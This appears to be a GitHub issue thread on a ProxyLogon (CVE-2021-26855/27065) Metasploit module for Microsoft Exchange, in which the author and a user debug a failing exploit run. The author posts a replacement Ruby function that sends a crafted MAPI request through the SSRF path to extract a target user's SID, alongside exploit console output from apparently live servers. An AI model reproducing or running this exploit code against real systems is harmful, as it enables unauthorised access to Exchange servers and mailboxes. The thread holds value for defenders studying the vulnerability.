mekhalleh / exchange_proxylogon

Module pack for #ProxyLogon (part of my contribution to Metasploit-Framework) [CVE-2021-26855 && CVE-2021-27065]

Exploit aborted due to failure: unknown: No 'SID' was found #1

Closed Q1984 closed 3 years ago

Q1984 commented 3 years ago

Does it mean the server is theoretically vulnerable but really isn't?

mekhalleh commented 3 years ago

Hard to say without more than that.

Try with the last modification I just pushed.

Q1984 commented 3 years ago

Still no luck. Still the same:

[*] https://xx.xx.xx.xx:443 - Sending mapi request
[-] Exploit aborted due to failure: unknown: No 'SID' was found

Q1984 commented 3 years ago

Probably a manual SID option solves the issue?

mekhalleh commented 3 years ago

Yes, but it isn't normal. What is the server version? Windows + Exchange?

Can you replace the request_mapi function with:

  # Diagnostic version of request_mapi: dumps the raw MAPI response and extracts the user SID
  def request_mapi(server_name, legacy_dn, server_id)
    data = "#{legacy_dn}\x00\x00\x00\x00\x00\xe4\x04\x00\x00\x09\x04\x00\x00\x09\x04\x00\x00\x00\x00\x00\x00"
    headers = {
      'X-Requesttype' => 'Connect',
      'X-Requestid' => '{E2EA6C1C-E61B-49E9-9CFB-38184F907552}:123456',
      'X-Clientinfo' => '{2F94A2BF-A2E6-4CCCC-BF98-B5F22C542226}',
      'X-Clientapplication' => datastore['MapiClientApp']
    }

    sid = ''
    response = send_http(
      'POST',
      "Admin@#{server_name}:444/mapi/emsmdb?MailboxId=#{server_id}&a=~1942062522",
      data,
      'application/mapi-http',
      headers
    )
    if response.code == 200
      # Domain SID with four sub-authorities of any width (fixed-width classes miss
      # SIDs whose sub-authorities have a different digit count); S-1-5-18 does not match
      sid_regex = /S-[0-9]-[0-9]-[0-9]{2}-[0-9]+-[0-9]+-[0-9]+-[0-9]+/
      match = response.body.match(sid_regex)
      # String#match returns MatchData (or nil), not a String: return the matched text
      sid = match[0] if match
    end

    print_status(" DEBUG --> respcode: #{response.code}")
    print_status(" DEBUG --> body:\n#{response.body}")

    fail_with(Failure::Unknown, 'No \'SID\' was found') if sid.to_s.empty?

    sid
  end

mekhalleh commented 3 years ago

My result is:

[*] https://172.20.2.110:443 - Sending mapi request
[*]  DEBUG --> respcode: 200
[*]  DEBUG --> body:
PROCESSING
DONE
X-StartTime: Mon, 15 Mar 2021 15:08:52 GMT
X-ElapsedTime: 15

����Cexch2k16.pwned.laF
                      �KClientAccessServer=exch2k16.pwned.lab,ConnectTime=15/03/2021 19:08:52,ConnectionID=48

�
 $IMicrosoft.Exchange.RpcClientAccess.Server.LoginPermException: 'User SID: S-1-5-18' can't act as owner of a UserMailbox object '/o=First Organization/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=9b9d8cf634f44ec4a0eda5c1c7c311da-Gasto' with SID S-1-5-21-3756917241-677735496-3570881102-1141 and MasterAccountSid  (StoreError=LoginPerm)
   at Microsoft.Exchange.RpcClientAccess.Server.UserManager.User.CorrelateIdentityWithLegacyDN(ClientSecurityContext clientSecurityContext)
   at Microsoft.Exchange.RpcClientAccess.Server.RpcDispatch.<>c__DisplayClassc.<EcDoConnectEx>b__8()
   at Microsoft.Exchange.RpcClientAccess.Server.RpcDispatch.Execute(Func`1 getExecuteParameters, Func`1 executeDelegate, Action`1 exceptionSerializationDelegate)

and the SID is: S-1-5-21-3756917241-677735496-3570881102-1141

mekhalleh commented 3 years ago

I've fixed the SID regex match. Can you test too, please?

Q1984 commented 3 years ago

[*] https://xx.xx.xx.xx:443 - Sending mapi request
[*] sid: S-1-5-21-3956313580-2287587897-2401987453-500 (administrator@xxxx.xx)
[*] https://xx.xx.xx.xx:443 - Sending ProxyLogon request
[-] Exploit failed: NoMethodError undefined method `empty?' for #<MatchData "S-1-5-21-3956313580-2287587897-2401987453-500">

mekhalleh commented 3 years ago

Yep. I'm working on it ;)

Q1984 commented 3 years ago

App: Exchange Server 2013 CU11 (15.0.1156.6)
OS: Windows 2012

mekhalleh commented 3 years ago

Normally, the last update works fine.